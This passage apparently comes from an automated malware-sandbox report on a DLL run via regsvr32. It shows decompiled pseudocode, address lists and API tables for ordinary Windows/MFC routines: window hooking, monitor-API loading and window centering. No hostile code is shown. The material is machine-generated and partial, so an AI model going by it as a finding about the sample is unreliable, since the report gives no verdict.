                                                                                                                                                                            						_pop(_t97);
                                                                                                                                                                            						if(_t88 == 0) {
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                                                                                                                                            					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                                                                                                                                            						goto L27;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t56;
                                                                                                                                                                            					if(_t56 != 0) {
                                                                                                                                                                            						goto L27;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                                                                                                                                            					L30:
                                                                                                                                                                            					return E10017C74(_t94, _t105, _t110);
                                                                                                                                                                            				}
                                                                                                                                                                            			}



























                                                                                                                                                                            0x10011389
                                                                                                                                                                            0x10011389
                                                                                                                                                                            0x10011389
                                                                                                                                                                            0x10011393
                                                                                                                                                                            0x10011398
                                                                                                                                                                            0x1001139b
                                                                                                                                                                            0x1001139e
                                                                                                                                                                            0x100113a8
                                                                                                                                                                            0x100113ae
                                                                                                                                                                            0x100113b5
                                                                                                                                                                            0x100113b7
                                                                                                                                                                            0x100113ba
                                                                                                                                                                            0x100113c0
                                                                                                                                                                            0x100113c2
                                                                                                                                                                            0x100113c4
                                                                                                                                                                            0x100113c4
                                                                                                                                                                            0x100113cd
                                                                                                                                                                            0x100113e2
                                                                                                                                                                            0x100113e4
                                                                                                                                                                            0x100113e7
                                                                                                                                                                            0x100113ec
                                                                                                                                                                            0x100113ee
                                                                                                                                                                            0x100113f2
                                                                                                                                                                            0x100113f8
                                                                                                                                                                            0x1001140f
                                                                                                                                                                            0x1001140f
                                                                                                                                                                            0x10011416
                                                                                                                                                                            0x10011463
                                                                                                                                                                            0x10011463
                                                                                                                                                                            0x10011465
                                                                                                                                                                            0x100114cd
                                                                                                                                                                            0x100114d5
                                                                                                                                                                            0x10011511
                                                                                                                                                                            0x1001151d
                                                                                                                                                                            0x10011524
                                                                                                                                                                            0x10011556
                                                                                                                                                                            0x10011559
                                                                                                                                                                            0x1001155f
                                                                                                                                                                            0x10011561
                                                                                                                                                                            0x10011564
                                                                                                                                                                            0x1001156c
                                                                                                                                                                            0x10011573
                                                                                                                                                                            0x10011575
                                                                                                                                                                            0x10011577
                                                                                                                                                                            0x1001157e
                                                                                                                                                                            0x10011586
                                                                                                                                                                            0x10011588
                                                                                                                                                                            0x1001158b
                                                                                                                                                                            0x1001158e
                                                                                                                                                                            0x1001159c
                                                                                                                                                                            0x1001159c
                                                                                                                                                                            0x1001158b
                                                                                                                                                                            0x10011577
                                                                                                                                                                            0x100115a2
                                                                                                                                                                            0x100115a8
                                                                                                                                                                            0x100115b4
                                                                                                                                                                            0x100115ba
                                                                                                                                                                            0x100115c1
                                                                                                                                                                            0x100115c3
                                                                                                                                                                            0x100115c8
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100115d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011526
                                                                                                                                                                            0x100114d9
                                                                                                                                                                            0x100114e4
                                                                                                                                                                            0x100114ef
                                                                                                                                                                            0x100114f5
                                                                                                                                                                            0x100114fb
                                                                                                                                                                            0x100114fc
                                                                                                                                                                            0x100114fe
                                                                                                                                                                            0x10011506
                                                                                                                                                                            0x10011509
                                                                                                                                                                            0x1001150f
                                                                                                                                                                            0x10011535
                                                                                                                                                                            0x1001153b
                                                                                                                                                                            0x1001153d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011547
                                                                                                                                                                            0x1001154b
                                                                                                                                                                            0x10011550
                                                                                                                                                                            0x10011554
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011554
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001150f
                                                                                                                                                                            0x1001146d
                                                                                                                                                                            0x10011472
                                                                                                                                                                            0x10011479
                                                                                                                                                                            0x10011482
                                                                                                                                                                            0x10011498
                                                                                                                                                                            0x1001149a
                                                                                                                                                                            0x100114a0
                                                                                                                                                                            0x100114a2
                                                                                                                                                                            0x100114a4
                                                                                                                                                                            0x100114a4
                                                                                                                                                                            0x100114ac
                                                                                                                                                                            0x100114b0
                                                                                                                                                                            0x100114b4
                                                                                                                                                                            0x100114b8
                                                                                                                                                                            0x100114be
                                                                                                                                                                            0x100114c1
                                                                                                                                                                            0x100114c3
                                                                                                                                                                            0x100114c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100114b8
                                                                                                                                                                            0x1001141b
                                                                                                                                                                            0x10011421
                                                                                                                                                                            0x10011426
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001142c
                                                                                                                                                                            0x1001142f
                                                                                                                                                                            0x10011434
                                                                                                                                                                            0x10011441
                                                                                                                                                                            0x10011445
                                                                                                                                                                            0x1001144b
                                                                                                                                                                            0x1001144b
                                                                                                                                                                            0x10011454
                                                                                                                                                                            0x10011459
                                                                                                                                                                            0x1001145c
                                                                                                                                                                            0x1001145d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001145d
                                                                                                                                                                            0x100113fa
                                                                                                                                                                            0x10011401
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011407
                                                                                                                                                                            0x10011409
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100113cf
                                                                                                                                                                            0x100113d7
                                                                                                                                                                            0x100115d4
                                                                                                                                                                            0x100115d9
                                                                                                                                                                            0x100115d9

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 10011393
                                                                                                                                                                              • Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F
                                                                                                                                                                            • CallNextHookEx.USER32 ref: 100113D7
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            • GetClassLongA.USER32 ref: 1001141B
                                                                                                                                                                            • GlobalGetAtomNameA.KERNEL32 ref: 10011445
                                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001149A
                                                                                                                                                                            • _memset.LIBCMT ref: 100114E4
                                                                                                                                                                            • GetClassLongA.USER32 ref: 10011514
                                                                                                                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 10011535
                                                                                                                                                                            • GetWindowLongA.USER32 ref: 10011559
                                                                                                                                                                            • GetPropA.USER32 ref: 10011573
                                                                                                                                                                            • SetPropA.USER32 ref: 1001157E
                                                                                                                                                                            • GetPropA.USER32 ref: 10011586
                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 1001158E
                                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001159C
                                                                                                                                                                            • CallNextHookEx.USER32 ref: 100115B4
                                                                                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 100115C8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                                                            • API String ID: 1191297049-4034971020
                                                                                                                                                                            • Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                                                                                            • Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
                                                                                                                                                                            • Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                                                                                            • Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E1000D6C3() {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				struct HINSTANCE__* _t5;
                                                                                                                                                                            				_Unknown_base(*)()* _t6;
                                                                                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                                                                                            				_Unknown_base(*)()* _t8;
                                                                                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                                                                                            				_Unknown_base(*)()* _t10;
                                                                                                                                                                            				_Unknown_base(*)()* _t11;
                                                                                                                                                                            				_Unknown_base(*)()* _t12;
                                                                                                                                                                            				struct HINSTANCE__* _t18;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                            				_Unknown_base(*)()* _t24;
                                                                                                                                                                            
                                                                                                                                                                            				_t23 =  *0x1005a76c; // 0x0
                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                            					_push(_t20);
                                                                                                                                                                            					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
                                                                                                                                                                            					_t18 = GetModuleHandleA("USER32");
                                                                                                                                                                            					__eflags = _t18;
                                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                                            						L12:
                                                                                                                                                                            						 *0x1005a750 = 0;
                                                                                                                                                                            						 *0x1005a754 = 0;
                                                                                                                                                                            						 *0x1005a758 = 0;
                                                                                                                                                                            						 *0x1005a75c = 0;
                                                                                                                                                                            						 *0x1005a760 = 0;
                                                                                                                                                                            						 *0x1005a764 = 0;
                                                                                                                                                                            						 *0x1005a768 = 0;
                                                                                                                                                                            						_t5 = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                                                                            						__eflags = _t6;
                                                                                                                                                                            						 *0x1005a750 = _t6;
                                                                                                                                                                            						if(_t6 == 0) {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                                                                            							__eflags = _t7;
                                                                                                                                                                            							 *0x1005a754 = _t7;
                                                                                                                                                                            							if(_t7 == 0) {
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                                                                            								__eflags = _t8;
                                                                                                                                                                            								 *0x1005a758 = _t8;
                                                                                                                                                                            								if(_t8 == 0) {
                                                                                                                                                                            									goto L12;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                                                                            									__eflags = _t9;
                                                                                                                                                                            									 *0x1005a75c = _t9;
                                                                                                                                                                            									if(_t9 == 0) {
                                                                                                                                                                            										goto L12;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                                                                            										__eflags = _t10;
                                                                                                                                                                            										 *0x1005a764 = _t10;
                                                                                                                                                                            										if(_t10 == 0) {
                                                                                                                                                                            											goto L12;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                                                                            											__eflags = _t11;
                                                                                                                                                                            											 *0x1005a760 = _t11;
                                                                                                                                                                            											if(_t11 == 0) {
                                                                                                                                                                            												goto L12;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                                                                            												__eflags = _t12;
                                                                                                                                                                            												 *0x1005a768 = _t12;
                                                                                                                                                                            												if(_t12 == 0) {
                                                                                                                                                                            													goto L12;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_t5 = 1;
                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x1005a76c = 1;
                                                                                                                                                                            					return _t5;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t24 =  *0x1005a760; // 0x0
                                                                                                                                                                            					return 0 | _t24 != 0x00000000;
                                                                                                                                                                            				}
                                                                                                                                                                            			}

















                                                                                                                                                                            0x1000d6c6
                                                                                                                                                                            0x1000d6cc
                                                                                                                                                                            0x1000d6db
                                                                                                                                                                            0x1000d6e7
                                                                                                                                                                            0x1000d6f2
                                                                                                                                                                            0x1000d6f4
                                                                                                                                                                            0x1000d6f6
                                                                                                                                                                            0x1000d78a
                                                                                                                                                                            0x1000d78a
                                                                                                                                                                            0x1000d790
                                                                                                                                                                            0x1000d796
                                                                                                                                                                            0x1000d79c
                                                                                                                                                                            0x1000d7a2
                                                                                                                                                                            0x1000d7a8
                                                                                                                                                                            0x1000d7ae
                                                                                                                                                                            0x1000d7b4
                                                                                                                                                                            0x1000d6fc
                                                                                                                                                                            0x1000d708
                                                                                                                                                                            0x1000d70a
                                                                                                                                                                            0x1000d70c
                                                                                                                                                                            0x1000d711
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d713
                                                                                                                                                                            0x1000d719
                                                                                                                                                                            0x1000d71b
                                                                                                                                                                            0x1000d71d
                                                                                                                                                                            0x1000d722
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d724
                                                                                                                                                                            0x1000d72a
                                                                                                                                                                            0x1000d72c
                                                                                                                                                                            0x1000d72e
                                                                                                                                                                            0x1000d733
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d735
                                                                                                                                                                            0x1000d73b
                                                                                                                                                                            0x1000d73d
                                                                                                                                                                            0x1000d73f
                                                                                                                                                                            0x1000d744
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d746
                                                                                                                                                                            0x1000d74c
                                                                                                                                                                            0x1000d74e
                                                                                                                                                                            0x1000d750
                                                                                                                                                                            0x1000d755
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d757
                                                                                                                                                                            0x1000d75d
                                                                                                                                                                            0x1000d75f
                                                                                                                                                                            0x1000d761
                                                                                                                                                                            0x1000d766
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d768
                                                                                                                                                                            0x1000d76e
                                                                                                                                                                            0x1000d770
                                                                                                                                                                            0x1000d772
                                                                                                                                                                            0x1000d777
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d779
                                                                                                                                                                            0x1000d77b
                                                                                                                                                                            0x1000d77b
                                                                                                                                                                            0x1000d77b
                                                                                                                                                                            0x1000d777
                                                                                                                                                                            0x1000d766
                                                                                                                                                                            0x1000d755
                                                                                                                                                                            0x1000d744
                                                                                                                                                                            0x1000d733
                                                                                                                                                                            0x1000d722
                                                                                                                                                                            0x1000d711
                                                                                                                                                                            0x1000d77e
                                                                                                                                                                            0x1000d789
                                                                                                                                                                            0x1000d6ce
                                                                                                                                                                            0x1000d6d0
                                                                                                                                                                            0x1000d6da
                                                                                                                                                                            0x1000d6da

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,74ED5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                                            • API String ID: 667068680-68207542
                                                                                                                                                                            • Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                                                                                            • Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
                                                                                                                                                                            • Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                                                                                            • Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				struct tagRECT _v28;
                                                                                                                                                                            				struct tagRECT _v44;
                                                                                                                                                                            				struct tagRECT _v60;
                                                                                                                                                                            				struct tagRECT _v80;
                                                                                                                                                                            				char _v100;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                            				struct HWND__* _t59;
                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                            				struct HWND__* _t104;
                                                                                                                                                                            				void* _t105;
                                                                                                                                                                            				struct HWND__* _t107;
                                                                                                                                                                            				long _t108;
                                                                                                                                                                            				long _t116;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            				struct HWND__* _t121;
                                                                                                                                                                            				void* _t123;
                                                                                                                                                                            				intOrPtr _t125;
                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                            
                                                                                                                                                                            				_t119 = __edx;
                                                                                                                                                                            				_t105 = __ebx;
                                                                                                                                                                            				_t125 = __ecx;
                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                            				_v8 = E10012862(__ecx);
                                                                                                                                                                            				_t58 = _a4;
                                                                                                                                                                            				if(_t58 == 0) {
                                                                                                                                                                            					if((_v8 & 0x40000000) == 0) {
                                                                                                                                                                            						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                                                                            					}
                                                                                                                                                                            					_t121 = _t59;
                                                                                                                                                                            					if(_t121 != 0) {
                                                                                                                                                                            						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                                                                            						if(_t104 != 0) {
                                                                                                                                                                            							_t121 = _t104;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                                                                            					_t121 =  *_t4;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t105);
                                                                                                                                                                            				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                                                                            				if((_v8 & 0x40000000) != 0) {
                                                                                                                                                                            					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                                                                            					GetClientRect(_t107,  &_v28);
                                                                                                                                                                            					GetClientRect(_t121,  &_v44);
                                                                                                                                                                            					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if(_t121 != 0) {
                                                                                                                                                                            						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                                                                            						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                                                                            							_t121 = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_v100 = 0x28;
                                                                                                                                                                            					if(_t121 != 0) {
                                                                                                                                                                            						GetWindowRect(_t121,  &_v44);
                                                                                                                                                                            						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
                                                                                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t94 = E1000A7CE();
                                                                                                                                                                            						if(_t94 != 0) {
                                                                                                                                                                            							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                                                                            						}
                                                                                                                                                                            						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
                                                                                                                                                                            						CopyRect( &_v44,  &_v80);
                                                                                                                                                                            						CopyRect( &_v28,  &_v80);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t108 = _v60.left;
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				_t123 = _v60.right - _t108;
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				_t120 = _v44.bottom;
                                                                                                                                                                            				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                                                                            				_a4 = _v60.bottom - _v60.top;
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                            				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                                                                            				if(_t116 >= _v28.left) {
                                                                                                                                                                            					if(_t123 + _t116 > _v28.right) {
                                                                                                                                                                            						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t116 = _v28.left;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t129 >= _v28.top) {
                                                                                                                                                                            					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                                                                            						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t129 = _v28.top;
                                                                                                                                                                            				}
                                                                                                                                                                            				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                                                                            			}

























                                                                                                                                                                            0x1000f530
                                                                                                                                                                            0x1000f530
                                                                                                                                                                            0x1000f537
                                                                                                                                                                            0x1000f53a
                                                                                                                                                                            0x1000f542
                                                                                                                                                                            0x1000f545
                                                                                                                                                                            0x1000f54a
                                                                                                                                                                            0x1000f558
                                                                                                                                                                            0x1000f56a
                                                                                                                                                                            0x1000f55a
                                                                                                                                                                            0x1000f55d
                                                                                                                                                                            0x1000f55d
                                                                                                                                                                            0x1000f570
                                                                                                                                                                            0x1000f574
                                                                                                                                                                            0x1000f580
                                                                                                                                                                            0x1000f588
                                                                                                                                                                            0x1000f58a
                                                                                                                                                                            0x1000f58a
                                                                                                                                                                            0x1000f588
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f54c
                                                                                                                                                                            0x1000f58c
                                                                                                                                                                            0x1000f59a
                                                                                                                                                                            0x1000f5a3
                                                                                                                                                                            0x1000f643
                                                                                                                                                                            0x1000f64a
                                                                                                                                                                            0x1000f651
                                                                                                                                                                            0x1000f65b
                                                                                                                                                                            0x1000f5a9
                                                                                                                                                                            0x1000f5ab
                                                                                                                                                                            0x1000f5b0
                                                                                                                                                                            0x1000f5bb
                                                                                                                                                                            0x1000f5c4
                                                                                                                                                                            0x1000f5c4
                                                                                                                                                                            0x1000f5bb
                                                                                                                                                                            0x1000f5c8
                                                                                                                                                                            0x1000f5cf
                                                                                                                                                                            0x1000f610
                                                                                                                                                                            0x1000f61f
                                                                                                                                                                            0x1000f62c
                                                                                                                                                                            0x1000f5d1
                                                                                                                                                                            0x1000f5d1
                                                                                                                                                                            0x1000f5d8
                                                                                                                                                                            0x1000f5da
                                                                                                                                                                            0x1000f5da
                                                                                                                                                                            0x1000f5ea
                                                                                                                                                                            0x1000f5fd
                                                                                                                                                                            0x1000f607
                                                                                                                                                                            0x1000f607
                                                                                                                                                                            0x1000f5cf
                                                                                                                                                                            0x1000f66a
                                                                                                                                                                            0x1000f66f
                                                                                                                                                                            0x1000f674
                                                                                                                                                                            0x1000f678
                                                                                                                                                                            0x1000f67b
                                                                                                                                                                            0x1000f682
                                                                                                                                                                            0x1000f68a
                                                                                                                                                                            0x1000f692
                                                                                                                                                                            0x1000f69a
                                                                                                                                                                            0x1000f6a1
                                                                                                                                                                            0x1000f6a6
                                                                                                                                                                            0x1000f6b2
                                                                                                                                                                            0x1000f6ba
                                                                                                                                                                            0x1000f6ba
                                                                                                                                                                            0x1000f6a8
                                                                                                                                                                            0x1000f6a8
                                                                                                                                                                            0x1000f6a8
                                                                                                                                                                            0x1000f6c0
                                                                                                                                                                            0x1000f6cf
                                                                                                                                                                            0x1000f6d7
                                                                                                                                                                            0x1000f6d7
                                                                                                                                                                            0x1000f6c2
                                                                                                                                                                            0x1000f6c2
                                                                                                                                                                            0x1000f6c2
                                                                                                                                                                            0x1000f6ef

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 808654186-3887548279
                                                                                                                                                                            • Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                                                                                            • Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
                                                                                                                                                                            • Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                                                                                            • Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                            				void* _t16;
                                                                                                                                                                            				intOrPtr* _t18;
